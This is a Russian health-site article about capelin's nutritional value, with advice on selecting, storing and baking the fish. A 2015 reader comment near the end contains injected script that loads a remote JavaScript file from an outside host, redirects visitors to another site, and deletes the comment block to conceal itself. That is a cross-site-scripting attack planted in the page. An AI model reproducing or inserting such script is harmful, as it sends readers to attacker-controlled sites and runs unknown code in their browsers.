Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мойва. Супер-рыба для кос...  >>  Мойва. Супер-рыба для костей
 
Обратная связь
 

Мойва. Супер-рыба для костей

Размер шрифта
24 ноября 2011 08:13
  • google_analytics: false
  • Нравится

Эта маленькая рыба сохранит ваши кости и мозг. Как выбрать, как хранить и как приготовить мойву?

Мойва – морская рыба семейства корюшковых. Ее длина всего 22 см, масса – не больше 65 г. Мойва обитает в Ледовитом, Атлантическом и Тихом океанах.

Достоинства мойвы

  1. Содержит много селена, примерно в 10 раз больше, чем в мясе.

  2. В мясе мойвы 23% белка, который легко усваивается.

  3. Соединительных тканей в этом мясе мало. Вот почему мойва готовится так быстро.

  4. Витаминов группы В в мойве столько же, сколько в мясе. Витаминов А и D – значительно больше.

  5. По количеству важнейших аминокислот – метионина, цистеина, треонина и лизина – мойва превосходит растительные продукты.

  6. В мойве очень много йода, фтора, брома, калия, натрия, фосфора.

  7. Мойва богата полиненасыщенными жирными кислотами Омега-3. Они уменьшают уровень холестерина и способствуют исчезновению бляшек на стенках сосудов.

  8. В одной порции мойвы – недельная норма йода для человека.  

Пьедестал почета по содержанию фосфора на 100 г

1. Сельдь – 280 мг.
2. Мойва – 240 мг.
3. Кефаль – 221 мг.

Для чего человеку фосфор?
1. Необходим для поддержания структуры костей и зубов.
2. Участвует производстве и делении клеток.
3. Снижает вероятность камней в почках.
Важно соблюдать баланс фосфора и кальция: кальция должно быть в 1,5-2 раза больше. При избытке фосфора начинается выведение кальция из костей. При избытке кальция начинается мочекаменная болезнь. Если в организме мало фосфора, костная ткань разрушается, снижается умственная и физическая работоспособность человека.

Как выбрать

  • Всегда смотрите на дату производства. Если рыба долго находится в заморозке, кристаллики льда могут разрушить ее структуру.
  • Если рыба в вакуумной упаковке – в ней не должно быть пузырьков воздуха.
  • Глаза рыбы должны быть выпуклыми, с прозрачной роговицей, черным и блестящим зрачком.
  • Чешуя должна плотно прилегать к коже.
  • Жабры должны быть жесткими, ярко-красными и без слизи.

Как хранить

  • Прежде чем отправить мойву в холодильник, надо высушить ее бумажным полотенцем, положить в стеклянную посуду, накрыть пищевой пленкой.
  • Хранить при температуре не ниже 0°С не больше 4-5 дней.
  • Перед заморозкой мойву надо очистить, промыть, обсушить. Потом завернуть ее в фольгу и положить в вакуумную упаковку. Хранить не больше 2-х месяцев. 
  • Вакуумная упаковка – обязательное условие хранения рыбы. Иначе мясо будет «обожжено» воздухом, и на поверхности продукта появятся желтые пятна.

Как приготовить

  • Откажитесь от размораживания при горячей воде. Лучший способ разморозки – естественный, при комнатной температуре.
Рецепт запеченной мойвы

  1. Мойву разморозить, промыть.

  2. Разложить на противне.

  3. Посолить, присыпать мукой и специями для рыбы.

  4. Запекать 15-20 минут.

  5. Перед подачей украсить зеленью.

Видеосюжеты по теме: 

Мойва. О большой пользе маленькой рыбки

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.